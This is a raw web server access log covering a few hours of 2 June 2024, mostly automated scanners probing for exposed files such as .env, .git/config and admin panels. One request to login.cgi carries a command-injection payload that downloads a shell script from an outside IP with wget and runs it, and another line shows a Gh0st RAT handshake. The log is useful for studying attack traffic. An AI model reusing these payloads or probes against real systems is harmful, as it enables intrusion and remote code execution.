185.224.128.43 - - [02/Jun/2024:01:00:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.224.128.43 - - [02/Jun/2024:01:04:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
157.230.103.49 - - [02/Jun/2024:01:06:09 +0200] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 326 "-" "Go-http-client/1.1"
180.251.180.15 - - [02/Jun/2024:01:12:10 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
35.203.211.207 - - [02/Jun/2024:01:13:17 +0200] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
185.224.128.43 - - [02/Jun/2024:01:13:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
35.203.210.58 - - [02/Jun/2024:01:19:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
185.224.128.43 - - [02/Jun/2024:01:20:16 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
195.154.87.70 - - [02/Jun/2024:01:21:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.224.128.43 - - [02/Jun/2024:01:22:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
178.128.162.225 - - [02/Jun/2024:01:23:51 +0200] "\x16\x03\x01" 501 318 "-" "-"
178.128.162.225 - - [02/Jun/2024:01:23:51 +0200] "\x16\x03\x01" 501 318 "-" "-"
178.128.162.225 - - [02/Jun/2024:01:23:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
178.128.162.225 - - [02/Jun/2024:01:23:52 +0200] "GET /form.html HTTP/1.1" 404 314 "-" "curl/8.1.2"
178.128.162.225 - - [02/Jun/2024:01:23:52 +0200] "GET /upl.php HTTP/1.1" 404 312 "-" "Mozilla/5.0"
178.128.162.225 - - [02/Jun/2024:01:23:52 +0200] "\x16\x03\x01" 501 318 "-" "-"
178.128.162.225 - - [02/Jun/2024:01:23:52 +0200] "GET /geoip/ HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
178.128.162.225 - - [02/Jun/2024:01:23:52 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
178.128.162.225 - - [02/Jun/2024:01:23:52 +0200] "GET /1.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
178.128.162.225 - - [02/Jun/2024:01:23:52 +0200] "GET /bundle.js HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
178.128.162.225 - - [02/Jun/2024:01:23:52 +0200] "GET /files/ HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
178.128.162.225 - - [02/Jun/2024:01:23:52 +0200] "GET /systembc/password.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
178.128.162.225 - - [02/Jun/2024:01:23:52 +0200] "GET /password.php HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
178.128.162.225 - - [02/Jun/2024:01:23:52 +0200] "GET /info.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
165.154.118.9 - - [02/Jun/2024:01:25:58 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 9_0_2; Win64; x64) AppleWebKit/577.55 (KHTML, like Gecko) Chrome/94.0.1254 Safari/537.36"
165.154.118.9 - - [02/Jun/2024:01:25:59 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Go-http-client/1.1"
165.154.118.9 - - [02/Jun/2024:01:26:00 +0200] "GET /sitemap.xml HTTP/1.1" 404 316 "-" "Go-http-client/1.1"
165.154.118.9 - - [02/Jun/2024:01:26:00 +0200] "GET /robots.txt HTTP/1.1" 404 315 "-" "Go-http-client/1.1"
165.154.118.9 - - [02/Jun/2024:01:26:02 +0200] "GET /axis2-admin/ HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36"
165.154.118.9 - - [02/Jun/2024:01:26:03 +0200] "GET /axis2/ HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36"
165.154.118.9 - - [02/Jun/2024:01:26:03 +0200] "GET /axis2/axis2-admin/ HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36"
185.191.126.213 - - [02/Jun/2024:01:26:09 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
85.90.246.159 - - [02/Jun/2024:01:26:26 +0200] "\x16\x03\x01" 501 318 "-" "-"
128.199.52.28 - - [02/Jun/2024:01:27:30 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0"
185.191.126.213 - - [02/Jun/2024:01:28:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
194.59.31.92 - - [02/Jun/2024:01:30:34 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
194.59.31.92 - - [02/Jun/2024:01:30:35 +0200] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
64.226.121.172 - - [02/Jun/2024:01:30:52 +0200] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 326 "-" "Go-http-client/1.1"
185.224.128.43 - - [02/Jun/2024:01:33:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.191.126.213 - - [02/Jun/2024:01:34:08 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
195.154.87.70 - - [02/Jun/2024:01:35:34 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.224.128.43 - - [02/Jun/2024:01:36:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
37.139.5.66 - - [02/Jun/2024:01:38:05 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://193.35.18.164/klausschwab.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "linus-torvalds-loves-you"
167.94.146.59 - - [02/Jun/2024:01:38:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.146.59 - - [02/Jun/2024:01:38:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.146.59 - - [02/Jun/2024:01:38:51 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
167.94.146.59 - - [02/Jun/2024:01:38:51 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
205.210.31.255 - - [02/Jun/2024:01:43:32 +0200] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
167.172.165.223 - - [02/Jun/2024:01:44:10 +0200] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 326 "-" "Go-http-client/1.1"
52.230.152.13 - - [02/Jun/2024:01:45:13 +0200] "GET /robots.txt HTTP/1.1" 404 327 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.0; +https://openai.com/gptbot)"
87.236.176.218 - - [02/Jun/2024:01:47:10 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)"
78.153.140.179 - - [02/Jun/2024:01:47:36 +0200] "\x16\x03\x01" 501 318 "-" "-"
78.153.140.179 - - [02/Jun/2024:01:47:36 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
85.90.246.159 - - [02/Jun/2024:01:49:54 +0200] "\x16\x03\x01" 501 318 "-" "-"
167.172.165.223 - - [02/Jun/2024:01:51:15 +0200] "GET /solr/admin/info/system HTTP/1.1" 404 327 "-" "Go-http-client/1.1"
167.172.165.223 - - [02/Jun/2024:01:51:15 +0200] "GET /solr/admin/cores?action=STATUS&wt=json HTTP/1.1" 404 321 "-" "Go-http-client/1.1"
185.191.126.213 - - [02/Jun/2024:02:01:46 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.191.126.213 - - [02/Jun/2024:02:02:17 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.191.126.213 - - [02/Jun/2024:02:02:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.191.126.213 - - [02/Jun/2024:02:05:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
194.59.31.92 - - [02/Jun/2024:02:06:02 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
194.59.31.92 - - [02/Jun/2024:02:06:02 +0200] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
64.62.197.4 - - [02/Jun/2024:02:11:00 +0200] "\x16\x03\x01" 501 318 "-" "-"
64.62.197.152 - - [02/Jun/2024:02:11:11 +0200] "\x16\x03\x01" 501 318 "-" "-"
164.92.244.132 - - [02/Jun/2024:02:11:12 +0200] "\x16\x03\x01" 501 318 "-" "-"
164.92.244.132 - - [02/Jun/2024:02:11:12 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
164.92.244.132 - - [02/Jun/2024:02:11:12 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; Android 6.0; HTC One M9 Build/MRA800062) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.3562.98 Mobile Safari/537.3"
164.92.244.132 - - [02/Jun/2024:02:11:12 +0200] "GET /server HTTP/1.1" 404 311 "-" "Go-http-client/1.1"
164.92.244.132 - - [02/Jun/2024:02:11:12 +0200] "GET /.vscode/sftp.json HTTP/1.1" 404 322 "-" "Go-http-client/1.1"
164.92.244.132 - - [02/Jun/2024:02:11:12 +0200] "GET /about HTTP/1.1" 404 310 "-" "Go-http-client/1.1"
164.92.244.132 - - [02/Jun/2024:02:11:12 +0200] "GET /debug/default/view?panel=config HTTP/1.1" 404 323 "-" "Go-http-client/1.1"
164.92.244.132 - - [02/Jun/2024:02:11:12 +0200] "GET /v2/_catalog HTTP/1.1" 404 316 "-" "Go-http-client/1.1"
164.92.244.132 - - [02/Jun/2024:02:11:12 +0200] "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application HTTP/1.1" 404 380 "-" "Go-http-client/1.1" ffc5722872.scan.leakix.org - - [02/Jun/2024:02:11:12 +0200] "GET /server-status HTTP/1.1" 403 322 "-" "Go-http-client/1.1"
164.92.244.132 - - [02/Jun/2024:02:11:12 +0200] "GET /login.action HTTP/1.1" 404 317 "-" "Go-http-client/1.1"
164.92.244.132 - - [02/Jun/2024:02:11:12 +0200] "GET /_all_dbs HTTP/1.1" 404 313 "-" "Mozilla/5.0 (l9scan/2.0.4383e2634323e21393e2231323; +https://leakix.net)"
164.92.244.132 - - [02/Jun/2024:02:11:12 +0200] "GET /.DS_Store HTTP/1.1" 404 314 "-" "Go-http-client/1.1"
164.92.244.132 - - [02/Jun/2024:02:11:12 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Go-http-client/1.1"
164.92.244.132 - - [02/Jun/2024:02:11:12 +0200] "GET /.git/config HTTP/1.1" 404 316 "-" "Go-http-client/1.1"
164.92.244.132 - - [02/Jun/2024:02:11:12 +0200] "GET /s/4383e2634323e21393e2231323/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties HTTP/1.1" 404 403 "-" "Go-http-client/1.1"
164.92.244.132 - - [02/Jun/2024:02:11:15 +0200] "GET /config.json HTTP/1.1" 404 316 "-" "Go-http-client/1.1"
164.92.244.132 - - [02/Jun/2024:02:11:15 +0200] "GET /telescope/requests HTTP/1.1" 404 323 "-" "Go-http-client/1.1"
164.92.244.132 - - [02/Jun/2024:02:11:15 +0200] "GET /?rest_route=/wp/v2/users/ HTTP/1.1" 200 1229 "-" "Go-http-client/1.1"
185.191.126.213 - - [02/Jun/2024:02:13:00 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.191.126.213 - - [02/Jun/2024:02:14:17 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
178.128.207.138 - - [02/Jun/2024:02:28:49 +0200] "\x16\x03\x01" 501 318 "-" "-"
178.128.207.138 - - [02/Jun/2024:02:28:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
178.128.207.138 - - [02/Jun/2024:02:28:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; Android 6.0; HTC One M9 Build/MRA800067) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.3562.98 Mobile Safari/537.3"
178.128.207.138 - - [02/Jun/2024:02:28:49 +0200] "GET /server HTTP/1.1" 404 311 "-" "Go-http-client/1.1"
178.128.207.138 - - [02/Jun/2024:02:28:49 +0200] "GET /.vscode/sftp.json HTTP/1.1" 404 322 "-" "Go-http-client/1.1"
178.128.207.138 - - [02/Jun/2024:02:28:49 +0200] "GET /about HTTP/1.1" 404 310 "-" "Go-http-client/1.1"
178.128.207.138 - - [02/Jun/2024:02:28:49 +0200] "GET /debug/default/view?panel=config HTTP/1.1" 404 323 "-" "Go-http-client/1.1"
178.128.207.138 - - [02/Jun/2024:02:28:49 +0200] "GET /v2/_catalog HTTP/1.1" 404 316 "-" "Go-http-client/1.1"
178.128.207.138 - - [02/Jun/2024:02:28:49 +0200] "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application HTTP/1.1" 404 380 "-" "Go-http-client/1.1" eab9c05722.scan.leakix.org - - [02/Jun/2024:02:28:49 +0200] "GET /server-status HTTP/1.1" 403 322 "-" "Go-http-client/1.1"
178.128.207.138 - - [02/Jun/2024:02:28:49 +0200] "GET /login.action HTTP/1.1" 404 317 "-" "Go-http-client/1.1"
178.128.207.138 - - [02/Jun/2024:02:28:49 +0200] "GET /_all_dbs HTTP/1.1" 404 313 "-" "Mozilla/5.0 (l9scan/2.0.9383e2634323e21393e2231323; +https://leakix.net)"
178.128.207.138 - - [02/Jun/2024:02:28:49 +0200] "GET /.DS_Store HTTP/1.1" 404 314 "-" "Go-http-client/1.1"
178.128.207.138 - - [02/Jun/2024:02:28:49 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Go-http-client/1.1"
178.128.207.138 - - [02/Jun/2024:02:28:49 +0200] "GET /.git/config HTTP/1.1" 404 316 "-" "Go-http-client/1.1"
178.128.207.138 - - [02/Jun/2024:02:28:49 +0200] "GET /s/9383e2634323e21393e2231323/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties HTTP/1.1" 404 403 "-" "Go-http-client/1.1"
178.128.207.138 - - [02/Jun/2024:02:28:52 +0200] "GET /config.json HTTP/1.1" 404 316 "-" "Go-http-client/1.1"
178.128.207.138 - - [02/Jun/2024:02:28:52 +0200] "GET /telescope/requests HTTP/1.1" 404 323 "-" "Go-http-client/1.1"
178.128.207.138 - - [02/Jun/2024:02:28:52 +0200] "GET /?rest_route=/wp/v2/users/ HTTP/1.1" 200 1229 "-" "Go-http-client/1.1"
64.62.156.44 - - [02/Jun/2024:02:40:10 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
66.240.205.34 - - [02/Jun/2024:02:40:19 +0200] "Gh0st\xad" 501 321 "-" "-"
94.156.65.209 - - [02/Jun/2024:02:40:19 +0200] "GET /.git/config HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/9.0.601.0 Safari/534.14"
64.62.197.92 - - [02/Jun/2024:02:41:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Safari/605.1.15"
74.82.47.3 - - [02/Jun/2024:02:41:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:124.0) Gecko/20100101 Firefox/124.0"
64.62.156.49 - - [02/Jun/2024:02:42:46 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0"
64.62.156.45 - - [02/Jun/2024:02:43:20 +0200] "GET /geoserver/web/ HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
64.62.197.99 - - [02/Jun/2024:02:43:47 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0"
74.82.47.3 - - [02/Jun/2024:02:44:28 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
64.62.197.96 - - [02/Jun/2024:02:44:31 +0200] "GET /geoserver/web/ HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Safari/605.1.15"
74.82.47.3 - - [02/Jun/2024:02:45:06 +0200] "GET /geoserver/web/ HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:124.0) Gecko/20100101 Firefox/124.0"
168.232.14.26 - - [02/Jun/2024:02:47:27 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
195.154.87.70 - - [02/Jun/2024:02:48:03 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
194.59.30.3 - - [02/Jun/2024:02:50:12 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
194.59.30.3 - - [02/Jun/2024:02:50:13 +0200] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
195.154.87.70 - - [02/Jun/2024:02:52:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
207.154.255.62 - - [02/Jun/2024:02:57:17 +0200] "GET /solr/admin/info/system HTTP/1.1" 404 327 "-" "Go-http-client/1.1"
207.154.255.62 - - [02/Jun/2024:02:57:17 +0200] "GET /solr/admin/cores?action=STATUS&wt=json HTTP/1.1" 404 321 "-" "Go-http-client/1.1"
167.94.145.101 - - [02/Jun/2024:03:14:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.145.101 - - [02/Jun/2024:03:14:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.145.101 - - [02/Jun/2024:03:14:25 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
167.94.145.101 - - [02/Jun/2024:03:14:25 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
51.158.154.254 - - [02/Jun/2024:03:28:21 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0"
51.158.154.254 - - [02/Jun/2024:03:30:04 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0"
51.158.154.254 - - [02/Jun/2024:03:30:31 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0"
78.153.140.179 - - [02/Jun/2024:03:32:27 +0200] "\x16\x03\x01" 501 318 "-" "-"
78.153.140.179 - - [02/Jun/2024:03:32:27 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
195.154.87.70 - - [02/Jun/2024:03:45:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
87.121.69.52 - - [02/Jun/2024:03:48:12 +0200] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
87.121.69.52 - - [02/Jun/2024:03:49:19 +0200] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
87.121.69.52 - - [02/Jun/2024:03:50:04 +0200] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
205.210.31.54 - - [02/Jun/2024:03:50:57 +0200] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
195.154.87.70 - - [02/Jun/2024:03:52:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
87.121.69.52 - - [02/Jun/2024:03:54:36 +0200] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
195.154.87.70 - - [02/Jun/2024:03:56:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
94.156.65.209 - - [02/Jun/2024:03:57:13 +0200] "GET /.git/config HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Linux; Android 9; ONEPLUS A6013) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36"
87.121.69.52 - - [02/Jun/2024:03:58:05 +0200] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
45.43.33.218 - - [02/Jun/2024:03:59:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0"
87.121.69.52 - - [02/Jun/2024:04:08:13 +0200] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
87.121.69.52 - - [02/Jun/2024:04:11:22 +0200] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
87.121.69.52 - - [02/Jun/2024:04:15:28 +0200] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
198.235.24.100 - - [02/Jun/2024:04:15:32 +0200] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
87.121.69.52 - - [02/Jun/2024:04:21:07 +0200] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
194.59.31.92 - - [02/Jun/2024:04:23:25 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
194.59.31.92 - - [02/Jun/2024:04:26:07 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
205.210.31.100 - - [02/Jun/2024:04:27:16 +0200] "\x16\x03\x01" 501 318 "-" "-"
205.210.31.100 - - [02/Jun/2024:04:27:16 +0200] "\x16\x03\x01" 501 318 "-" "-"
71.6.134.232 - - [02/Jun/2024:04:33:12 +0200] "\x16\x03\x01" 501 318 "-" "-"
94.156.65.209 - - [02/Jun/2024:04:36:05 +0200] "GET /.git/config HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Linux; Android 5.1.1; A37f Build/LMY47V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.126 Mobile Safari/537.36"
213.32.39.40 - - [02/Jun/2024:04:48:16 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0"
34.140.108.54 - - [02/Jun/2024:04:48:29 +0200] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.32.2"
